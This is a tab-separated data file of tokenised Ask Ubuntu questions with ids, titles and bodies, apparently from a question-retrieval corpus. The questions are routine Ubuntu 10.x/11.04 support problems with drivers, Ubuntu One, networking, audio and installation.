46177	how to use a proprietary driver	i 've just installed ubuntu on a new machine and it work perfectly except for the nvidia graphics driver . when booting from the usb everything worked fine but ubuntu sent me to the `` classic '' interface when i booted for the first time . i installed unity 2d but it 's really not the same thing . now even when i log on with the ubuntu interface selected ( unity 3d ) ubuntu logs on with the 2d interface . i checked the `` additional drivers '' tool and it tells me that the driver is `` activated but not in use '' what can i do to resolve the problem ? update : here 's a screenshot of the `` additional drivers '' utility
46181	dvb-t sound in vlc is jittering	after upgrading to natty sound is jittering in vlc when watching dvb-t. about every 5 seconds the sounds stops for milliseconds , which is annoying . dvb-t sound works fine in mplayer . probably this is a bug in vlc . how to get this fixed in natty ?
46182	gnome-terminal tabs are very dark , difficult to tell which tab is in use	here are two applications that use tabs : gedit and gnome-terminal gedit : it is relatively easy to see which document is being edited terminal : it is difficult to tell whether i am using the left or right terminal , because both of the tabs are very dark . is it me having bad eyes , or the choice of colors is questionable here ? i tried all settings in the gnome-terminal application , to no avail . i am using the `` ambiance '' appearance , which is default . in `` customize theme '' , i tried to change the `` controls '' setting to `` radiance '' , it solves the problem but it also turns the indicators bar to silver , which does not fit with the launcher 's dark background . gnome-terminal users , how are you dealing with this problem ?
46183	how to map a network drive ?	i am unable to map a windows network drive in ubuntu . i have entered the following command in the terminal : karthick @ karthick : ~ $ sudo mount -t cifs -o username=raghu //172.29.32.184 /media/data/ password : mount error ( 2 ) : no such file or directory refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) but it returned an error . i hope someone can sort this out . thanks in advance .
46184	how can i simulate a right-click in kubuntu 10.10 when using a touchscreen ?	i am running kubuntu 10.10 on my wetab tablet pc . as this tablet has no mouse ( but a touchscreen ) , i would like to configure kubuntu in a way that allows to perform a right-click . in ubuntu ( not kubuntu ) , there is an option to just hold the left-click for about 3 seconds in order to perform a right-click ( mouse = > accessibility = > `` trigger secondary click by holding down the primary button '' ) . i ca n't find something similar in kubuntu ...
46187	indicator applet icons spacing too large	i 'm using gnome classic , ubuntu 11.04 . the icon spacing for the indicator applet icons is just too large . is it me or has this happened to someone else ? has anyone found a fix ? back in 10.10 , a ppa , ppa : m0sia i think , had packages that corrected this design sore . there are no packages there for natty atm .
46192	missing nautilus integration following ubuntu-one reinstall	i had problems syncing ! ubuntu one would kick out error messages about being unable to connect but syncdaemon would continue chewing through resources until ubuntu itself crashed . i tried everything to stop the syncdaemon but to no avail even after reboot and eventually removed ubuntu one . i 've now successfully added back ubuntu one and my `` ubuntu one '' folder is syncing fine and syncdaemon appears to now be behaving correctly . however i seem to have completely lost nautilus integration . i have no option to sync any folder other than the `` ubuntu one '' folder . i have no ubuntu one options when i right click folders . i read about u1sdtools and i understand how to unsubscribe from folders using this tool but not how to add them . when i type u1sdtool -- list-folders in terminal it replies no folders , i assume i need to use u1sdtool -- subscribe-folder=folder_id however everything i could find suggests i find the folder id by using -- list-folders and of course there are n't any . bring back that ubuntu one folder ribbon and all is forgiven ! anyone any ideas ? any help appreciated !
46196	apache not working - 500 error	fresh new install of ubuntu fresh new install of apache2 . apache not working , where should i start ? it 's installed , it restarts properly it just does n't show anything in the browser but a 500 error : http error 500 ( internal server error ) : an unexpected condition was encountered while the server was attempting to fulfill the request .
46197	how to check video memory size ?	is there a way to check the size of the video memory ? specifically , is there one that works accurately for both integrated gpu 's as well as pci/agp graphics cards ? many integrated gpu 's have dynamically allocated memory , so the solution would hopefully return either the maximum available video memory or the currently allocated amount . for stand-alone nvidia or ati cards it would obviously return the total amount of physical gpu ram . lspci -v does output memory figures , but i do not believe it is the video memory . i suspect the figure reported is some system memory allocation or block or channel size , but i do n't know for sure . you can see in these test results that lspci was wrong in 5 of the 6 tests .
46200	help me install guest additions on ubuntu 11.04	i 'm having problems installing guest additions on a ubuntu 11.04 guest os . the host os is windows xp pro on the host os ( windows xp ) , i also have another guest os ubuntu 10.04 , and i have had no problem installing guest additions on that . when i try installing guest additions on the guest os ubuntu 11.04 , i get a message saying the headers for the current running kernel was not found so i installed linux-headers-generic tried installing guest additions again , and got the same message as before : the headers for the current running kernel was not found so my question is , how do i install guest additions on the guest os ubuntu 11.04 where windows xp is the host os . i just checked with uname -a to get the correct version , then check using aptitude and noticed that the correct version is already installed . i am using virtualbox 4.0.8 .
46203	disable x server and gnome temporarily	i need to execute some tests on a script of mine which requires a lot of cpu cycles . is there a way to kill the gui ? i tried but it always restarts by itself .
46207	how can i run program from terminal without killing the program when closing the terminal	tho whole problem is that if i run a program from gnome terminal ( e.g . gedit something ) the program gedit runs , but if i close gnome terminal , the program gedit closes too . i know alt+f2 exist , but i want to use gnome terminal . any help is really appreciated . : )
46217	best strategy for dealing with power interruption	i 'm trying to use ubuntu 10.04/32 in an embedded environment with no keyboard attached . power interruption is expected and happening quite often . right now i get a splashscreen requiring some keyboard input , if some ext3 partition gets corrupted . i need that to be handled automatically , without any user input . what is the best strategy for dealing with this ?
46223	how can i recover data deleted using find -delete ?	hi guys ! i am working on ubuntu 10.04 version . i accidentally deleted my code from find -delete command . is there any way to recover the data ? many thanks in advance .
46226	can i reinstall ubuntu one	ubuntuone is not working -- connection issues -- and i 've been having trouble with using funambol and syncevolution as a substitute , so i 'd like to try to get ubuntu one working for me . i tried reinstalling it with synaptic , i walked through the troubleshooting steps on ubuntuone . when i open ubuntuone from the `` me '' menu , it does appear to connect to my account -- it reports my usage and shows my current plan and devices , but it also says `` disconnected '' i tried the fix at : unable to connect to ubuntu one u1sdtool -s just sits there -- nothing happens and i do n't get a new command prompt . u1sdtool -q does report ubuntuone-syncdaemon stopped . i removed my computer from the list , removed .cache/ubuntuone .config/ubuntuone and ~/ubuntu one and tried to connect again . now i 'm getting a status response at least : [ 0 amanda @ luna ~ ] $ u1sdtool -s state : ready connection : not user not network description : ready to connect is_connected : false is_error : false is_online : false queues : idle so i tried again -- did u1sdtool -q and this time there was also a .local/share/ubuntuone directory to remove , along with ubuntu one and the ubuntuone directories in .cache and .config . i also did ps aux | grep ubuntu and killed two running processes : amanda 3062 0.1 0.7 45372 23460 ? sl 07:54 0:19 /usr/bin/python /usr/lib/ubuntuone-client/ubuntuone-login amanda 7373 13.6 6.1 402320 189516 ? sl 10:27 1:48 /usr/lib/firefox-3.6.17/firefox-bin http : //one.ubuntu.com/account then i u1sdtool -- start followed by u1sdtool -c and firefox did open the `` connect this computer '' dialog , which seems to have worked . so i seem to be connected . but man , oh man was that a pill . any idea how i should have gone about this to begin with ?
46232	can i limit the size of ~/.xsession-errors ?	is there some way to limit size of .xsession-errors. ? i 'm getting huge numbers of one particular debug information messages and it has blown the file size up to 2.8 gb ( over many months ) . the message accounts for 95 % of all the lines in .xsession-errors . i think i know which app it is , and i 'll have to look into that separately , but for now i 'd like to know if there is a setting to prevent open-ended growth of the log.. the log is currently split over 2 files.. ( 0.8 gb and 2.0 gb ) update : after applying robinj 's suggestion of logrotate ( which does keep the file size down ) , i noticed that after i manually deleted the 2.0 gb file .xsession-errors.old , it has re-appeared ( size = 0 ) ... this means that something other than logrotate is managing this log file , in which case it seems that this other app may be able to manage the log 's size limit , etc . and would be more appropriate.. what is this program ? =========== post answer edit : my update actually changed the tone of the original question and mark russell has answered this second point very well ... . robinj has answered my original question as per the title.. thanks to both..
46233	converting djvu to pdf	i want to convert a djvu document into a pdf document , separating and preserving the text layer and the images while also keeping the structure from the djvu . how can i do this in ubuntu ? ( i will then be using calibre to convert to epub/mobi , so if there were a calibre plug-in for this entire process that would be perfect for me ! ) note1 : printing from evince , exporting from djview , or anything using the package ddjvu , are not adequate solutions as they discard the text layer , saving only images . note2 : using djvulibre seems to only extract the text layer and pictures are not extracted . similarly , copying the text `` manually '' loses the both document structure and the pictures .
46239	unable to resume if suspended for more than 20 minutes on a dell inspiron n5010	i am using 11.04 64bit on dell inspiron n5010 . i have this strange problem , if i leave my laptop suspended for more than 20 minutes ( approx . ) then it does not resume . it works fine if i resume within or less than 20 minutes . i have 4gb ram and 8gb swap space , my system have ati 5000 series graphics card and and i am using proprietary drivers installed via jockey .
46240	will encrypting my ( huge ) home directory slow performance ?	the ubuntu installer offers to encrypt my home directory . since i have hundreds of gigabytes in my home folder i am worried encrypting might slow my computer down . should i be worried ?
46242	how can i password-protect a folder ?	i 'd like to place private documents into a password-protected folder . it 's important that * even if someone is using my account they ca n't access the folder * the folder be encrypted
46246	remove all borders and tab bars from yakuake ?	machine : kubuntu 11.04x64 w/ kde4 the top terminal is of yakuake w/ `` no border '' option already enabled the bottom is of konsole w/ `` no border '' option also enabled how do i remove all borders from yakuake to make it resemble konsole at the bottom so as only the transparent terminal portion is visible ? if not possible what is a better replacement to yakuake that has true no border settings , as well allows drag/drop of texts into the terminal ? already tried tilda but it does n't allow you to drag and drop texts into the terminal ; tried guake but ca n't get it to work in kubuntu .
46251	reinstalling ubuntu from the command line	i recently upgraded my htpc to 11.04 and since it comes with the unity dock i decided to get rid of cairo dock . unfortunately , while trying to uninstall cairo dock i ended up removing too many packages ( i even saw some nvidia packages being removed ) and ubuntu wo n't run anymore . i get to a black screen which lists a bunch of daemons that have started and then it goes no further , not even a command prompt . i can get to the command prompt if i start in recovery mode . i have tried running the following commands but none of them fixed the problem : sudo apt-get install ubuntu-desktop this one completed successfully but did nothing . dpkg-reconfigure -phigh -a this failed , i do n't have the exact error message right now , but it complained about an unrecognized image or some such thing . dpkg-reconfigure xserver-xorg this did n't seem to do anything . i can reinstall the os without any loss of data because all of it is on a second drive , the only changes i 'd made to the os were installing xbmc , samba and cairo dock . however , to complicate things further , i ca n't boot off of a usb drive anymore ! i know that used to work because that was how i 'd installed lucid in the first place , but now , even though the bios list an attached storage device , grub ( or maybe it 's the bios ? not sure which one ) wo n't recognize that the usb drive is bootable . i 've tried creating the bootable usb using unetbootin and universal usb installer , with both 11.04 and 10.04 , but no combination is working . the pc does not have an optical drive , so usb is the only option . is there a command-line command to reinstall the os ? or do i need to pull the hard drive and wipe it ? edit 1 running ls /var/log/dpkg . * lists the following files : /var/log/dpkg.log /var/log/dpkg.log.1 /var/log/dpkg.log.2.gz ... /var/log/dpkg.log.10.gz i tried to upload the first log file to pastebin using pastebinit /var/log/dpkg.log but it fails with the following error : ioerror : [ errno socket error ] [ errno 104 ] connection reset by peer dpkg-reconfigure -phigh -a fails with the following error : update-initramfs : generating /boot/initrd.img-2.6.35-22-generic-pae cron stop/waiting dpkg-maintscript-helper : error : could n't identify the package
46256	is a stock tethered internet connection ( 2.2 ) shareable between linux laptops ?	i 've been casually working on this for a few months but i 'm finally getting frustrated enough to post about it . i was wondering if it was possible to share the tethered internet connection that comes stock on android phones with 2.2 with an additional laptop ? to be clear , i want to have a laptop receiving a tethered internet connection from a 2.2 android phone and i want to share that with another laptop connected through ethernet . specifically , i 'm trying to do this on ubuntu linux 10.10 . i have gotten this to work on windows 7 using easytether and the windows ics but unfortunately i need this to work on ubuntu linux . note , this really does n't help me because i would really like this to work as a legitimate network , when i use easytether to share the connection , i can not ping the other laptop , which makes me think they are connected in a different manner besides routes . also note , the easytether and ubuntu 's ics through network manager does not work . the latest thing i have tried is to set up a bridge between the phone 's network interface and the 2nd laptop 's interface . this allows me to ping to the phone from the second laptop . however , this disables the internet the laptop the phone is connected to and i certainly ca n't get on the internet on the second laptop . so , i guess what i 'm asking is : is this sort of thing even possible ? if anyone has any suggestions , advice , or links , i would be glad to listen .
46264	generate ip address to bypass shared ip	my isp forces a shared ip on their users , is there a way to generate an ip address to bypass it ? even if bypassing shared ip is not possible , what are the methods to set/change a unique ip address ?
46266	syncing a c++ app with ubuntu one	i 'm currently developing an app , in c++ , that will sync it 's data with ubuntu one , but i ca n't find any documentation online that explains how to do this . i found ryan paul 's ars technica article that provides an excellent introduction to doing this in python while mentioning that there exists a library that will facilitate this in c , but it does n't provide an hint as to where this c-based solution can be found . i 've googled around for a bit , but no-one seems to be talking about developing apps that take advantage of ubuntu one sync . does anyone know where i can information on this c-based interface ?
46267	why does my computer say that there is an 11.10 upgrade ?	i always use update-manager -d just so i remember that there is a space bar between manager and -d. i ran it today and it showed the bellow image . why does it do this or is there really an 11.10 update ? is someone just screwing around with me ?
46269	automatic startup of ubuntu installed alongside windows ?	this is not so much as a problem a problem as a question . i bought and emachines desktop about two years ago , pretty good i would say , and i installed ubuntu 11.04 alongside recently . on startup of the machine i get an option to go ahead and run windows or i can scroll down to ubuntu . now , there is nothing wrong with this and both operating systems work flawlessly but i find it an annoyance to have to stay at my computer to make it run ubuntu , i.e . i ca n't turn it on and leave and have it automatically run ubuntu . how can i change this so that ubuntu is the `` default '' operating system to run ? thanks
46270	how to set up hot corners ?	i am using 10.10 and i would like to set up hot corners . can i do this with compiz ? how ? i tried ubuntu tweak but it did not let me choose a specific application to run on hot corners ( it only show windows/workspaces etc . ) .
46273	how can i upgrade sqlite3 to at least 3.4.2 ( or newer ) ?	when i try to run sudo apt-cache showpkg sqlite3 , i only get the version 3.4.2 . i need later than that to compile the sqlite3-ruby gem , and i ca n't make from source files ( even with a ./configure -- prefix=/usr/bin , then a make , then a sudo make install . is there a guide or a way to manually apt-get remove sqlite3 and compile the latest source ( 3.6.7.3 , as found here for ubuntu ) so i can get sqlite3 -version up above 3.4.2 ? ! i 've been hunting all around the web , to no avail .
46274	wget ca n't download entire website	i want to download entire website . it has a very simple structure , pure html+css , no cms or whatever . however , instead of most pages i get the same 31byte file , with a string `` requested range not satisfiable '' i run wget as following : wget -m -p -k -u mozilla http : //address what options can i try ?
46285	installer asks me to insert installation cd that is already in the cd drive	i am trying to do a clean install of 11.04 ( server ) . in the middle of the install i get the request to insert `` ubuntu-server 11.04 natty narwhal - release i386 ( 20110426 ) '' in the /media/cdrom drive . the ubuntu install disk that i created from the iso is already in the drive . nothing works to leave from this screen . what do i need to do ?
46286	how do i finish the installation of a program from source ?	i compiled sqlite3 from source code , version 3.6.16 . i used -- prefix=/usr/bin as my only compiling option . the binaries compiled and installed correctly , but at the directory /usr/bin/sqlite3/bin . so the application sits at /usr/bin/sqlite3/bin/sqlite3 . now , how do i `` tell linux '' that sqlite3 is installed to there ? so when i run which sqlite3 it would print /usr/bin/sqlite3/bin/sqlite3 ? i need this version specifically of sqlite3 for compiling a rubygem ; sqlite3-ruby , v1.3.0 or higher . i assume i will be adding a path or something to my ~/.profile and then running source .profile to reload the changes . what is `` telling linux '' where applications are installed to called ? symlinks ?
46289	choppy video with intel hd	i have an ibm thinkpad with an intel hd graphics card . it is a dualboot with windows . the video performance i am getting is very choppy . it does not matter if it is a youtube video or from a file . it is choppy . the same files under windows are not . this is not an issue of flash . i have tried other formats as well , with the same results . i have also tried a number of different players . using smplayer i have a feeling that it may be connected to the audio . changing the settings for the output driver does change how choppy it is . it is more or less , but always choppy..
46299	how to disable touchpad tapping when typing on keyboard ?	i used to have an option in settings in kubuntu 10.10 to do this . now i can not find it in 11.04 . where can i find it ? or was it removed ?
46302	why is the new ubuntu monospace font only available for 11.04 ?	... and not for lucid ( 10.04 ) ? i just checked it here on two of my machines , one running lucid and one running natty . and yes , i am approved member of this special group on launchpad . addition : i 'm not asking how to get this font ... because i already got it ... yes for lucid too , i just copied the contents of the natty package onto my lucid installation . i ask for the `` why ? `` .
46312	all files from ubuntu one are gone after re-installing windows 7	i ran natty for a while , then switched to maverick . once i was on maverick , i set up ubuntu one and synced all of my school files . no problem so far . then i had to wipe my hd and install windows , since i had a critical project due that i could n't figure out how to do in ubuntu ( i would have run a vm , but i could n't get it to work for some reason ) . now i log into ubuntu one from my windows 7 machine , and all of my files are gone ! ! these are my school files , guys , including a term paper that 's due in not long at all . please please please tell me they 're not gone forever ! !
46314	volume applet in the tray has gone . how can i get it back ?	ok , so i installed kde on my ubuntu 11.04 laptop . it worked ok , but i wanted to change back , and free up the space , so ( having kept unity etc . installed ) , just rebooted into what gdm calls `` ubuntu '' . so far so good . i then wanted to rid myself of all kde packages , so di sudo apt-get remove kde* . i realise this was fairly silly . now i 've lost my sound applet in the system tray . it 's more annoying than anything else , but i 've got used to the play/pause functionality , so it 'd be nice to get it back . thanks in advance for whatever help you may be able to give !
46318	how can i create a a playlist file of all of the mp3s in the current directory from the terminal ?	i 'm looking for a solution to this or a recommendation for a program to check out . i 'd appreciate any help . update i would like to use the playlist file with poweramp for android .
46319	is there a way to query fonts that support a particular unicode range ?	i would like to find out which fonts actually have glyphs in a particular unicode range ( such as cyrillic , armenian , georgian etc ) . i am familiar with character map and font matrix programs , but there is no way to make a particular unicode range `` stick '' in order to see which fonts do support it . is there a better way than to have to click through all the fonts and eyeball all the ranges in the list box ? thanks !
46320	how to enable gpu switching	how do i enable vga switcheroo ? is there any way i can do it with a ui ? i am setting it up for someone who is not at all cli friendly . see the kernel module switcheroo if you do n't know it yet . it 's for an acer aspire 5820tg-6406 .
46323	why wo n't my volume control work ?	i recently installed gnome 3 in ubuntu 11.04 on a lenovo thinkpad t61p . since then , my hard volume buttons have stopped working , and my manual volume control via the top-right corner has had no impact on whether or not my computer releases sounds . as a matter of fact , i seem to have no os-wide volume control whatsoever : it 's always on . going into the gnome 3 `` sound settings '' makes me feel like there might be drivers missing , as it does n't recognize any of my hardware , or acknowledge that said hardware exists . i imagine this has something to do with drivers , but the drivers were working fine until i installed gnome 3 . so i suppose my main question is `` why is n't gnome 3 listed as the alpha software it is ? '' with a hefty side of `` does anybody know what happened to my sound drivers , '' and `` is there a magic wand i can wave to get them all back ? ''
46325	how to make a deb pkg for my pygtk app ?	i write a pygtk app and want to make a deb pkg for it . $ tree webpad/ webpad/ | -- jspad | | -- __init__.py | | -- main.py | | -- t.py | -- pixmaps | | -- c.png | | -- run.png | ` -- webpad.png | -- readme | -- run.py ` -- templates ` -- webpad.tpl 3 directories , 19 files do i need to change the directory layout ?
46328	unable to establish connection to mobile broadband connection	in unity , when i make a mobile broadband connection , i can dial-up in the bluetooth manager , saying my connection will appear in the network manager , but it does n't . any ideas ?
46331	how to avoid using sudo when working in /var/www ?	i want to stop having to use sudo everytime i work in /var/www . how can i do that ? i simply want to put all of my sites into this directory and work with them without too much pain .
46332	why can i not see my usb connected android device over ssh ?	i have a computer running mythbuntu 11.04 , and it has banshee 2.0 installed on it . i also have an android phone that i use as a music player . i want to get banshee and android talking to each other so that i can synchronize my playlists and all that good stuff . here 's the thing ... my mythbuntu machine is hidden away under a desk , where it acts as a sort of file and media server . it has a screen and remote control attached for watching videos , but no keyboard or mouse . when i want to use banshee , i access it from one of my other two machines via this ssh command : ssh -x mythbuntu @ 192.168.0.64 banshee so far , so good . now , i plug in my android device to a usb port on the mythbuntu machine , then open up banshee via ssh on one of my other computers . the android device does not appear in the banshee interface . for a long time i thought i was missing some driver or something , but after some experimentation , i discovered that if i open up banshee on the computer itself ( in other words , i plug in a keyboard and mouse and test out accessing it directly ) , then the android device is automagically detected and everything works as expected . so ... the problem seems to be that for some reason , when i am running banshee from an ssh connection , it can not see the android device . but that confuses me ... why should the ssh connection matter ? is it that the ssh user is a different user from the one when i log into the machine directly ( i use the same user name and password ) ? more importantly , is there a way i can convince banshee that when i open it via ssh and plug in the android device that it should talk to the android the same way it talks to android when i am sitting at the computer itself ? i hope i 've explained the situation clearly . any advice would be greatly appreciated .
46339	how could i tune the linux kernel parameters so that socket could be recycled frequently ?	i did some load test under ubuntu10.10 with siege 2.6.9 , script i used as follows , siege -c 900 -r 30 -i -f urls.txt , but i got tons of error messages like error : socket : unable to connect sock.c:222 : operation already in progress or socket timeout i noticed most requests ' response time are less than 0.2 secs , but after a while , some requests ' response time increased to 5 secs , and a pause happened periodically , so i did some linux kernel tuning jobs , e.g . sysctl -w net.ipv4.tcp_tw_reuse=1 sysctl -w net.ipv4.tcp_timestamps=1 sysctl -w net.ipv4.tcp_tw_recycle=1 after that , the circumstance became better , but not good enough , so could you guys could give me more infomation about socket/tcp parameters tuning on linux kernel parameters , such as recycle/reuse/close the sockets in a time_wait state . any advices or suggestions would be highly appreciated . many thanks .
46340	can not change empathy chat status from me menu when using irc	i use empathy as chat client for irc . since it is the default chat client , i expected that i can update ( availability ) status from top menu , but it is disabled .
46348	i ca n't install on acer aspire one 722	i ca n't install ubuntu 11.04 on acer aspire one 722 , this netbook using amd a50m fusion chipset and ati radeon hd 6250 graphics with 256mb of dedicated system memory . anyone can help me ? edit : ok i think i found a little bit of the problem . i try install ubuntu 10.10 and it 's worked . but when i install ubuntu 10.10 netbook edition , i ca n't load my ubuntu ( after choose a ubuntu from grub loader ) . maybe the problem is unity system or something like that .
46349	not all .mid midi files working	i have several midi files on my computer . they all play fine on 10.10 or earlier , but in 11.04 natty maybe only about 50 % of them play . totem will recognize all the files in natty and even show track time and show the song playing , but no audio . anyone care to venture why some midi files work and some dont in natty ? the same files work fine on 10.10 and a 10.04 system .
46350	cpanel like platform	i 'm looking for a automated point-and-click hosting platform like cpanel . is any free and open source platform and which of them do you thing is the best ? i prefer to be free of charge .
46354	right way to configure keymaps ?	whats the recommended way of setting keymaps loading on ubuntu 10.10 ? i have tried dpkg-reconfigure console-data but it does n't seem to work . neither does edit of /etc/default/console-setup loadkeys < keymap > works fine and i could load it myself , but where is the recommended place to store it ? i 'm using a virtual appliance from bitnami so perhaps it 's tweaked a little .
46355	new dell vostro 3550 will not boot into live cd	i 've been trying to install ubuntu and/or it 's derivatives on my new dell vostro 3550 but i 'm finding it impossible to boot into the live cd environment . here are the things i 've already tried : booting from multiple versions of multiple distributions ( ubuntu 10.10 , ubuntu 11.04 , mint 11 , mint 10 ) booting from a live usb created with unetbootin , the linux mint startup disk creator , the universal usb creator and dd of=linuxmint . ***.iso if if=/dev/sdx . burning a cd and booting from the internal cd drive . in the case of the usb keys with the latest versions of ubuntu it gets to the page where i can select a boot option , but after selecting an option the screen goes black , even the back light turns off . with the older distributions the screen stays on but it starts loading and then just hangs . the cds do n't even try to boot . it starts spinning but then falls back to the default windows install . the only way i 've got it to work so far is with wubi , but that 's hardly ideal . i 'd like to have two separate physical partitions with a /home and / . any help is appreciated . thank you .
46372	how do i remotely connect to a windows xp virtual machine	i 'm running windows xp on a virtual machine ( orace virtualbox 4.0.8 ) on a home server and i want to be able to connect to it from outside the network . i have the domain thanks to dyndns.com which points to the computer and the router is port-forwarded to the server computer . but am i supposed to forward to the server or the virtual machine 's ip ? now when i try to connect i get an error : failed to connect . and how does these authentication methods work : null , external , guest ?
46373	plus or dash at perm bits ?	when i need to find all files with suid recursively starting from root directory i can do it in two not so different ways : find / -perm -4000 and the second one : find / -perm +4000 which variant is preferable and why ?
46380	how do i use gpl and mit licenses correctly ?	since our own alaukik asked me to put a few scripts under gpl-license i wondered if i am doing it correctly . the points that concern me are : do i have to include the whole license with my project or is a comment like # copyright by john doe , 2011 licensed under the mit license : http : //www.opensource.org/licenses/mit-license.php legally sufficient ? do i have to include my real name or is an e-mail or other alias legally waterproof ? is the year important ? i would guess 'yes ' as copyrights expire in most countries after a certain period . what happens if i do n't ? should i use gpl over mit ? i tend towards mit as it is more permissive and i do n't care whether my scripts are commercially recycled . update : there is a very good page on 'how to use gnu licenses for your own software ' . the gnu website also makes suggestons on how to aply the licenses to your project ( â˘flimm ) . that covers a lot for the gpl . bottom line - license choice : if you want to support free software , do n't use too free a license . disallowing commercial use gives free software an edge over proprietary programs . in theory with some licenses re-usage of your code must credit your original . but re-usage is difficult to proof and some corporations might just not credit you . however , if you do want to spread your software as wide as possible , i.e you do n't care about commercial products using your software , then use mit or lgpl . if in doubt use the more restrictive license and add a line , saying you may consider permitting uses outside of the license terms on a by-case basis . this way commercial users with a project worthy of your work have a chance . bottom line - copyright dispute : include as much information as you dare to make proving it 's really your brainchild easier . have a lawsuit over the ownership in the back of your head . poor man 's copyright is mailing a printed copy of your source to your home address . if the envelope is unbroken , the postmark is valid evidence at court and provides a date and a verified address . an e-mail instead of your full name to identify you should be okay and sufficient proof but : better safe , than sorry .
46384	can totem play from last position only for videos ?	i have totem player configured in its options to resume playback from the last position . but it does this for both video and audio files . but , i want it only for the video files so i can resume from where i left off , but not for music files . i want music files to start from the beginning always . is there any way to force this ? currently i have to use a separate music player , but i do n't really want another player just for music .
46386	unity is disturbed after a partial upgrade	i had upgraded my workstation from maverick to natty . i switched to unity after this upgrade and was quite happy . in the last week of may , 2011 update manager proposed a partial upgrade . after the partial-upgrade following changes has appeared . login screen changed and looks like gnome3 top panel ( clock in middle , turn off option button on right , background is solid blue ) gtk controls are roughly rendered like redmond theme . appearance application is no where in the system to select between themes . no desktop , no panels , no lens just blackout except mouse arrow . alt-tab only works to switch between apps and synapse to launch new apps . note : i added the gnome3 ppa but never tried to install it . is this root of destruction ? how to restore it ? it is urgent as it is my workstation . thanks for any suggestion . here is dpkg.log http : //pastebin.com/grbwm86p that indicates the changes by partial upgrade . i tried unity -- replace that reloaded the unity and caused few changes unity panels are appeared but theme is still disturbed window decoration has lost close/min/max buttons and rendered in top panel only when maximized . no refreshed desktop rendering . an application minimized or moved left patterns on wallpaper area . *
46393	apt-get connection timeout	apt-get stopped working for me . it resolves us.archive.ubuntu.com to an ip address , but then does not connect to that address . i can ping that ip address and can also do a wget on the ip address and successfully download the page . i am connecting through a proxy , which is working fine for everything . apt-get has worked before , but stopped recently ( i 'm not the only one that uses the box , so not sure what could have changed ) . any ideas ? thanks .
46397	how to move wifi passwords to a new installation	i have an acer aspire zg5 netbook which is currently running jolicloud , but i 've decided it is n't for me and plan to switch to lubuntu or xubuntu . however , i do lot of travelling and have many saved wifi passwords for different offices , hotels , cafes , restaurants , friends ' and relatives ' houses etc . it would be very annoying to have to ask for and reenter all of these passwords . is there a way to transfer my saved wifi passwords from the old installation to the new one ?
46403	uk keyboard layout does n't show up	i 've the latest ubuntu version working on my desktop . but when i go to system - > preference - > keyboard - > layout and select english uk or any other country .. i can not see the keyboard layouts in the screen below . i did a fresh install on my old laptop and i can clearly see the different layouts for different countries . i believe there are some files missing that have the keymap data ? ? can someone please help with how i can reinstall those needed files ? my current layout is english us but i need to change it to english uk tired of searching ! many thanks for your help .
46410	audio output balance problem	i have a problem on my ubuntu 10.04 machine with audio output . when playing audio with a headset connected it can be heard on speakers and headset in the same time . it is similar to other questions i found on internet . but what is different is that when i change channel balance to left then only speaker is used . when i changed it to the right only headset is used . it looks like speaker is treated as left channel and headset as the right channel . my machine is a custom build intel atom based pc . audio driver snd-intel8x0 some additional information : dddd @ dddd : ~ $ lspci | grep audio 00:1e.2 multimedia audio controller : intel corporation 82801g ( ich7 family ) ac'97 audio controller ( rev 02 ) dddd @ dddd : /proc/asound $ cat /proc/asound/version advanced linux sound architecture driver version 1.0.23 . compiled on apr 21 2011 for kernel 2.6.32-32-generic-pae ( smp ) . dddd @ dddd : /proc/asound $ aplay -l **** list of playback hardware devices **** card 0 : ich7 [ intel ich7 ] , device 0 : intel ich [ intel ich7 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : ich7 [ intel ich7 ] , device 4 : intel ich - iec958 [ intel ich7 - iec958 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 00:1e.2 multimedia audio controller : intel corporation 82801g ( ich7 family ) ac'97 audio controller ( rev 02 ) flags : bus master , medium devsel , latency 0 , irq 17 i/o ports at d000 [ size=256 ] i/o ports at cc00 [ size=64 ] memory at fe93b800 ( 32-bit , non-prefetchable ) [ size=512 ] memory at fe93b400 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : < access denied > kernel driver in use : intel ich kernel modules : snd-intel8x0
46419	is it safe to run a gui program as another user ?	i need to run a program ( libreoffice ) as another user . i noticed that the program started in the background when invoked as kdesudo -u otheruser libreoffice , possibly to avoid social engineering attacks . ( in the below text , `` logged-in user '' refers to me , not `` otheruser '' ) is it safe to run an untrusted program in this way ? does it affect the current logged-in user ? ( file and process access in the context of the logged-in user ) denial of service attacks by fork-bombs , using excess cpu , etc . are excluded since those can occur too if i login directly on otheruser . for clarity , i 'm looking for differences between running programs in directly when logged in as otheruser and running programs using kdesudo , gksudo and sudo .
46421	sometimes unity boots , sometimes it does n't	i 'm wondering if someone can help me with my problem . it seems that sometimes unity boots no problem , and then at other times , i get the warning that my pc does n't have the proper display card ( yadda yadda ) and the machine boots in classic mode . obviously , though , my card is sufficient , though , as it sometimes boots no problem . what exacerbates the problem further is that if i try to log out so that i can log into safe mode , or classic mode , or unity mode , i get crazy squiggly lines on my monitor and my whole system freezes . very strange indeed .
46422	is n't the calendar applet supposed to show today 's date under the clock ?	i have n't used my computer for weeks , so i 'm asking here before i report a bug . if i click on the clock , it shows yesterday 's date above the calendar , but highlight 's today 's date . did i do something nuts to make that happen ? ( using a clean install of natty and unity . )
46424	adding ssh keys to authorized_keys	i have an ubuntu server on amazon ec2 , that i use for development , and today i stupidly cleared everything out of the authorized_keys file for ssh . luckily i have an ssh open , so i am still connected , and can fix the file , but when i try to put my key file back , it does n't work . i still get permission denied from the server on my local machine . my authorized_keys file has the permissions 600 and i have tried appending my ssh key with ssh-rsa and leaving the ssh-rsa off . i also tried making the ssh key all one line , but that did n't work either . so is there something else that i have to do like reload the authorized_keys file some how ?
46426	how to permanently change the time in ubuntu server	i have changed the time in ubuntu server 11.04 but when i reboot it resets to the default it has . how to change the time that when i boot it stays like i changed it . already tried date but i think this is only temporary .
